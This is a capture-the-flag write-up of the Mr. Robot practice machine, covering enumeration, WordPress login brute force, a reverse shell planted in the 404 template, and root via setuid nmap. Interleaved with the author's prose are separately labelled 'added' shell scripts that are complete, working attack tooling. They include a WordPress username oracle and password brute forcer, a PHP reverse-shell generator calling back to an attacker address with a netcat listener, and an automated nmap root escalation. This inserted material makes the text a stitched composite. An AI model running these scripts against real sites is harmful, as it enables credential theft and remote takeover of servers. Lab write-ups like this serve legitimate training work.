Safetech Blog - Security Tips and Tricks


by Oana Stoian

Mr. Robot Write-up

Being a fan of the series Mr. Robot, I decided to exploit this vulnerable machine, added by Jason.

Someone once said that the best way to be prepared for a hack when it happens is to be hacked. So, let's hack Mr. Robot 🙂

Starting with enumeration, I fired up nikto, which reveals a lot of useful information:

[Screenshot: nikto output]


I also tried nmap, but the only open ports are 80 and 443. No sneaky port here.

[Screenshot: nmap output]

Checking the nikto results reveals that the machine has a robots.txt file. Let's verify this... and voilà:

[Screenshot: contents of robots.txt]

Key-1-of-3 seems to be our first flag 🙂

I saved the dictionary (fsocity.dic) locally; it may come in handy later for a brute-force attack. Appending /key-1-of-3.txt to the URL returns the content of the file: 073403c8a58a1f80d943455fb30724b9

[Screenshot: contents of key-1-of-3.txt]
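The robots.txt step above can be scripted so that nothing listed there is missed. The following shell script is an added example and is not part of the original write-up: it parses the paths out of a robots.txt body (bare filenames, as on this box, as well as Disallow/Allow directives) and fetches each one from the target. The target address 10.0.2.15 is a hypothetical placeholder; the loot/ directory name is an assumption.

```shell
#!/bin/sh
# Added example (not from the original write-up): pull robots.txt from the
# target, extract every path it lists and fetch each one, so files such as
# key-1-of-3.txt and fsocity.dic are not missed.
# TARGET is a hypothetical placeholder; override it for a real run.
TARGET="${TARGET:-http://10.0.2.15}"

# Extract the paths from a robots.txt body passed on stdin.
# Accepts "Disallow: /x" and "Allow: /x" as well as bare filenames (the
# Mr. Robot box lists files without any directive), strips CR and comments,
# skips User-agent/Sitemap/Crawl-delay lines and the bare "/" entry, and
# makes sure every path starts with a slash.
robots_paths() {
    tr -d '\r' | sed 's/#.*$//' | awk '
        tolower($0) ~ /^[ \t]*(user-agent|sitemap|crawl-delay)[ \t]*:/ { next }
        {
            sub(/^[ \t]*([Dd]isallow|[Aa]llow)[ \t]*:[ \t]*/, "")
            gsub(/^[ \t]+|[ \t]+$/, "")
            if ($0 == "" || $0 == "/") next
            if (substr($0, 1, 1) != "/") $0 = "/" $0
            print
        }'
}

# Fetch every listed path into ./loot and report the HTTP status for each,
# so a 200 on something like /key-1-of-3.txt stands out immediately.
fetch_robots_paths() {
    mkdir -p loot
    curl -s "$TARGET/robots.txt" | robots_paths | while read -r path; do
        name=$(basename "$path")
        code=$(curl -s -o "loot/$name" -w '%{http_code}' "$TARGET$path")
        printf '%s %s -> loot/%s\n' "$code" "$path" "$name"
    done
}

# Usage (network access to TARGET required):
#   . ./robots.sh && fetch_robots_paths
```

robots_paths works on any robots.txt text, so it can also be pointed at a file saved from another host; fetch_robots_paths is the only function that touches the network.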

Nikto also revealed /wp-login.php, so I had to see what I could get from it.

[Screenshot: /wp-login.php]

Let's try some usernames and passwords. Thinking of the characters from the series, I first tried Mr Robot and then Elliot. The result is great, considering it was only the second guess for the username:

[Screenshot: login attempt with user elliot]

The error message says that the password I entered is incorrect, which confirms that the username elliot is valid. First thing that comes to mind: brute-forcing the password with Burp Intruder.

Running wpscan to enumerate users does not work on this machine, but wfuzz can do the job, using that same login error message as an oracle.

First we deduplicate the dictionary file fsocity.dic, which is full of duplicates (sort -u does the sort and uniq in one step):

sort -u fsocity.dic > mr_robot.dic

Next, we start wfuzz, which tries every word in the dictionary as a username in about 3 minutes:

[Screenshot: wfuzz output]

Brute-forcing the password of user elliot with Burp Intruder gives us the password:

[Screenshot: Burp Intruder result]
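The whole login attack above (dictionary clean-up, username enumeration through the WordPress error message, then a password brute force against the confirmed user) can be done with curl alone. The script below is an added example and is not the author's wfuzz or Burp Intruder setup; the target address 10.0.2.15 and the wordlist name mr_robot.dic are hypothetical placeholders, and the response strings it matches are the ones WordPress 4.x returns on wp-login.php.

```shell
#!/bin/sh
# Added example (not from the original write-up): WordPress login oracle and
# password brute force with curl. TARGET and WORDLIST are hypothetical
# placeholders; override them for a real run.
TARGET="${TARGET:-http://10.0.2.15}"
WORDLIST="${WORDLIST:-mr_robot.dic}"

# Deduplicate a dictionary in one pass and return the number of unique words.
dedupe_wordlist() {
    sort -u "$1" > "$2"
    wc -l < "$2" | tr -d ' '
}

# Classify one wp-login.php answer. WordPress 4.x leaks whether the user
# exists:
#   body contains "Invalid username"          -> no such user
#   body contains "... is incorrect"          -> user exists, wrong password
#   HTTP 302 (redirect to wp-admin, no error) -> valid credentials
# $1 is the HTTP status code, $2 the response body.
classify_login() {
    case "$2" in
        *"Invalid username"*) echo no_such_user ;;
        *"is incorrect"*)     echo wrong_password ;;
        *) if [ "$1" = 302 ]; then echo success; else echo unknown; fi ;;
    esac
}

# POST one credential pair (curl does not follow redirects by default, so a
# successful login shows up as a 302) and classify the answer.
try_login() {
    tl_tmp=$(mktemp)
    tl_status=$(curl -s -o "$tl_tmp" -w '%{http_code}' \
        --data-urlencode "log=$1" --data-urlencode "pwd=$2" \
        --data "wp-submit=Log+In" "$TARGET/wp-login.php")
    classify_login "$tl_status" "$(cat "$tl_tmp")"
    rm -f "$tl_tmp"
}

# Username enumeration: each word is sent with a dummy password and only the
# words that do NOT trigger "Invalid username" are printed. wfuzz does the
# same thing in parallel with --hs "Invalid username".
enumerate_users() {
    while read -r word; do
        if [ "$(try_login "$word" notthepassword)" = wrong_password ]; then
            echo "$word"
        fi
    done < "$WORDLIST"
}

# Password brute force for one confirmed user; stops at the first success.
brute_force_password() {
    while read -r word; do
        if [ "$(try_login "$1" "$word")" = success ]; then
            echo "$1:$word"
            return 0
        fi
    done < "$WORDLIST"
    return 1
}

# Usage (network access to TARGET required):
#   dedupe_wordlist fsocity.dic mr_robot.dic
#   enumerate_users            # prints e.g. elliot
#   brute_force_password elliot
```

One request per word makes the curl loop much slower than wfuzz or Intruder on a dictionary of this size, but classify_login is exactly the check those tools are configured to perform, and it is what to adapt if a site customises its login error text.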

After logging into the WordPress administrative interface, we need to find a way to the second flag.

One of the most common ways to execute commands with administrator rights in WordPress is to upload a PHP file or to insert PHP code into one of the theme's template files. Go to Appearance > Editor, choose 404 Template on the right of the page, and insert there the PHP code that initiates a reverse connection back to our Kali machine. Start a listener on the Kali machine first, then request a page that does not exist so that WordPress executes the modified 404 template.
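To make the 404 template step concrete, the following script is an added example (not code from the write-up): it prints the PHP snippet to paste into the template, starts the listener, and triggers the template with a request for a non-existent page. The attacker address 10.0.2.4:4444 and the target 10.0.2.15 are hypothetical placeholders.

```shell
#!/bin/sh
# Added example (not from the original write-up): reverse shell through the
# WordPress 404 template. LHOST/LPORT/TARGET are hypothetical placeholders.
LHOST="${LHOST:-10.0.2.4}"
LPORT="${LPORT:-4444}"
TARGET="${TARGET:-http://10.0.2.15}"

# Print a minimal PHP reverse shell for the given callback host and port.
# fsockopen connects back to the listener and proc_open attaches the stdin,
# stdout and stderr of /bin/sh directly to that socket; proc_close keeps the
# PHP request alive until the shell exits. Unlike the common
# exec("/bin/sh -i <&3 >&3 2>&3") one-liner, this does not depend on the
# socket happening to land on file descriptor 3.
php_reverse_shell() {
    cat <<EOF
<?php
set_time_limit(0);
\$sock = fsockopen("$1", $2);
if (\$sock) {
    \$proc = proc_open("/bin/sh -i", array(0 => \$sock, 1 => \$sock, 2 => \$sock), \$pipes);
    proc_close(\$proc);
}
?>
EOF
}

# Listener on the attacker side (netcat-openbsd or nmap's ncat syntax).
start_listener() { nc -lvnp "$1"; }

# Request a URL that certainly does not exist so WordPress renders the 404
# template, which now carries the payload. -m 5 stops curl from waiting on
# a request that never completes while the shell is alive.
trigger_404() { curl -s -m 5 "$TARGET/this-page-does-not-exist-$$" >/dev/null; }

# Usage:
#   php_reverse_shell "$LHOST" "$LPORT"   # paste output into the 404 Template
#   start_listener "$LPORT"              # in one terminal
#   trigger_404                          # in another terminal
```

The payload goes at the top of 404.php, before any HTML the theme emits, so the connection is made regardless of what the rest of the template does.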

Once the shell connects back, we continue with some local enumeration, such as listing the users present on the system:

[Screenshot: system users]

We notice the user robot, and in his home directory we find our next hint:

[Screenshot: MD5 hash found in robot's home directory]

A quick Google lookup of the MD5 hash gives us what appears to be the password of the robot user. Switching to that user takes us to the second flag:

[Screenshot: second flag]

Now it’s time for some more enumeration in order to escalate our privileges to root.

Looking for files with the SUID bit set returns nmap, among other binaries:

[Screenshot: SUID binaries]

We remember an article from the Go Null Yourself e-zine called Stupid Shell Tricks (https://www.exploit-db.com/papers/18168/), where nmap's interactive mode is mentioned as a means of backdooring a system, so we try to exploit this "feature":

[Screenshot: nmap interactive mode root shell]
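The privilege-escalation steps above, as an added example that is not part of the original write-up: find setuid files, separate the setuid-root ones (the only ones that yield a root shell) from the rest, and escalate through nmap's interactive mode. The shell spawned by `!sh` keeps nmap's effective uid; if /bin/sh on the box is bash rather than dash, bash drops the elevated euid unless started with -p, so use `!sh -p` in that case.

```shell
#!/bin/sh
# Added example (not from the original write-up): SUID hunting and the nmap
# --interactive escalation. Only old Nmap releases still have --interactive,
# which is why the trick works on this box.

# Print every setuid file under a directory (permission errors are hidden).
# Defaults to the whole filesystem, as in the write-up.
find_suid() {
    find "${1:-/}" -type f -perm -4000 2>/dev/null
}

# Read paths on stdin and print "ROOT  <path>" for setuid-root files and
# "<owner>  <path>" for setuid files owned by somebody else.
# ls -ld is used instead of stat -c so this also runs on non-GNU systems.
classify_suid() {
    while read -r f; do
        owner=$(ls -ld "$f" | awk '{print $3}')
        if [ "$owner" = root ]; then
            echo "ROOT  $f"
        else
            echo "$owner  $f"
        fi
    done
}

# Escalate via nmap --interactive: at the nmap> prompt, !sh spawns a shell
# with nmap's effective uid. Refuses to run when nmap is not setuid, since
# nothing would be gained.
nmap_root_shell() {
    nmap_bin=$(command -v nmap) || { echo "nmap not found" >&2; return 1; }
    [ -u "$nmap_bin" ] || { echo "$nmap_bin is not setuid" >&2; return 1; }
    echo "At the nmap> prompt type: !sh   (or !sh -p if /bin/sh is bash)" >&2
    "$nmap_bin" --interactive
}

# Usage on the target, as user robot:
#   find_suid | classify_suid      # look for ROOT  /usr/local/bin/nmap
#   nmap_root_shell                # then: !sh ; id ; cat /root/key-3-of-3.txt
```

Run `id` right after `!sh`: `euid=0(root)` is what you want to see; a plain `uid=1002(robot)` line means the shell dropped privileges and `!sh -p` is needed.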

Challenge done! The third flag was discovered.
